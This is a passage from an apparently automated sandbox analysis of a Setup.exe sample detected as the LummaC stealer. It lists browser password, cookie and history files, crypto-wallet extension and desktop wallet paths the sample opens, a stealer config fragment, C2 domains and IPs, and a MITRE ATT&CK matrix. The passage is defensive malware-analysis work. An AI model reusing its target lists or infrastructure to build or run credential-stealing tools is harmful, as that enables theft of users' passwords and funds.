              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: w"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory11
              File and Directory Discovery              		Remote Desktop Protocol31
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)12
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager224
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Query Registry              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets521
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
              Virtualization/Sandbox Evasion              		Cached Domain Credentials221
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Process Injection              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583071 Sample: Setup.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 79 abberanteusz.click 2->79 81 klipvumisui.shop 2->81 83 2 other IPs or domains 2->83 103 Suricata IDS alerts for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 8 other signatures 2->109 12 Setup.exe 1 2->12         started        signatures3 process4 dnsIp5 85 abberanteusz.click 172.67.198.102, 443, 49730, 49731 CLOUDFLARENETUS United States 12->85 87 cegu.shop 185.161.251.21, 443, 49744 NTLGB United Kingdom 12->87 89 klipvumisui.shop 104.21.37.128, 443, 49745 CLOUDFLARENETUS United States 12->89 69 C:\Users\...\WPNMSIA79IRF0S6IHRZ7TIDHI.exe, PE32 12->69 dropped 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->111 113 Suspicious powershell command line found 12->113 115 Query firmware table information (likely to detect VMs) 12->115 117 3 other signatures 12->117 17 WPNMSIA79IRF0S6IHRZ7TIDHI.exe 2 12->17         started        21 powershell.exe 15 23 12->21         started        file6 signatures7 process8 file9 61 C:\Users\...\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, PE32 17->61 dropped 91 Multi AV Scanner detection for dropped file 17->91 23 WPNMSIA79IRF0S6IHRZ7TIDHI.tmp 3 5 17->23         started        93 Loading BitLocker PowerShell Module 21->93 26 conhost.exe 21->26         started        signatures10 process11 file12 63 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->65 dropped 28 WPNMSIA79IRF0S6IHRZ7TIDHI.exe 